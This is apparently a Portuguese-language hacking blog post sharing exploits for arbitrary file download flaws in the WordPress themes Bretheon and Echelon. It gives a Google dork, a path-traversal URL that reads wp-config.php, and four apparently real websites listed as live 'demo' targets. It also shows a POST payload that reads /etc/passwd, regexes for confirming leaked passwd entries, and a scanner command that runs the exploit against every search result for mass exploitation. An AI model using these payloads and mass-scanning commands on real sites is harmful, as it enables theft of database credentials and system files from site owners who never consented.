Arbitrary File Download vulnerability no tema Bretheon do wordpress

Arbitrary File Download vulnerability o que eu chamo de A.F.D.

Foi encontrada tal falha no tema Bretheon do wordpress.

--------------------------------------------------------------------------------------------------------------

DETALHES
Acesso: http://1337day.com/exploit/23140
Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability
Date: 17/01/2014
Exploit Author: MindCracker - Team MaDLeeTs
Contact : [email protected] - [email protected]| https://twitter.com/MindCrackerKhan 
Tested on: Linux / Window

Google Dork: inurl:wp-content/themes/bretheon/
Demo

http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

 PoC

http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

--------------------------------------------------------------------------------------------------------------

Como tal falha no tema não usa nada de novo e o caminho padrão "admin-ajax.php?action=revslider_show_image&img="  nosso exploit desenvolvido meses atrás já faz tal verificação e pode ser usado tranquilamente.

--------------------------------------------------------------------------------------------------------------

[TUTORIAL]: 

https://www.youtube.com/watch?v=w6pxPR_s05w

TUTORIAL DETALHES:
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html

EXECUTE:
php exploit.php www.target.gov.us

--------------------------------------------------------------------------------------------------------------

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html

--------------------------------------------------------------------------------------------------------------

Wordpress A.F.D Theme Echelon Explorando tema wordpress falha Arbitrary File Download

EXPLOIT Wordpress A.F.D Theme Echelon

Explorando tema Echelon do wordpress falha Arbitrary File Download

# NAME:         Wordpress A.F.D Theme Echelon
# TIPE:         Arbitrary File Download
# Vendor:       www.wordpress.org
# Tested on:    Linux
# EXECUTE:      php exploit.php www.alvo.com.br
# OUTPUT:       EXPLOIT_WPAFD_Echelon.txt
# AUTOR:        GoogleINURL
# Blog:         http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:      https://fb.com/InurlBrasil
# GIT:          https://github.com/googleinurl
# YOUTUBE       https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA

Pois bem já que o 1337day não publicou o script posto aqui, "alias tem muito bla bla pra preeche odeio" rsrs.

A falha consista em explorar um um parâmetro $_POST do arquivo
/wp-content/themes/echelon/lib/scripts/dl-skin.php

Os seguintes campos são explorados para o Arbitrary File Download
Via POST:
_mysite_download_skin={$config['file']}&submit=Download
Ex:
_mysite_download_skin=/etc/passwd&submit=Download

Sem os devidos filtros podemos ter acesso a arquivos internos do servidor alvo.
Para tal validação desenvolvi um exploit pra validar tais valores expotos pelo /etc/passwd e  /etc/ shadow encontrando padrão baseado na seguintes expressões regulares:

------------------------------------------------------------------------------------------------

    preg_match_all("(root:.*)", $rest['corpo'], $final);

    preg_match_all("(sbin:.*)", $rest['corpo'], $final__);

    preg_match_all("(ftp:.*)", $rest['corpo'], $final___);

    preg_match_all("(nobody:.*)", $rest['corpo'], $final____);

    preg_match_all("(mail:.*)", $rest['corpo'], $final_____);

------------------------------------------------------------------------------------------------

Exploração:
Baixar Exploit: http://pastebin.com/14uVQyUV / http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
Modo de executar:
php exploit.php http://alvo
Resultado:

Agora vamos usar tal exploit junto com SCANNER INURLBR assim transformando o mesmo em um explorador massivo... EXPLORING MASS! EXPLORING MASS!

Baixar INURLBR: https://github.com/googleinurl/SCANNER-INURLBR

Comando de execução:
./inurlbr.php --dork '[DORK]inurl:/wp-content/themes/echelon[DORK]"index of" /themes/echelon' -q 1,6 -s save.txt --comand-all "php exploitAFD.php _TARGET_"

Explicando comando:

--dork vai definir código avançado de busca google.
[DORK] é uma expressão usada dentro do parâmetro --dork que possibilita usar varias dorks em uma só analise.
-s salvar alguns sites vulns caso o scanner encontre.
-q define motores de busca a serem usados.
--comand-all executa comando no terminal para cada alvo encontrado.
para mais informações sobre --comand consulte o help do script.
Ajuda:
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

Resultado execução:

Pesquisa dork:
DORK: inurl:/wp-content/themes/echelon
DORK: "index of" /themes/echelon

Baixar Exploit: http://pastebin.com/14uVQyUV
Ajuda: https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo
Baixar INURLBR: https://github.com/googleinurl/SCANNER-INURLBR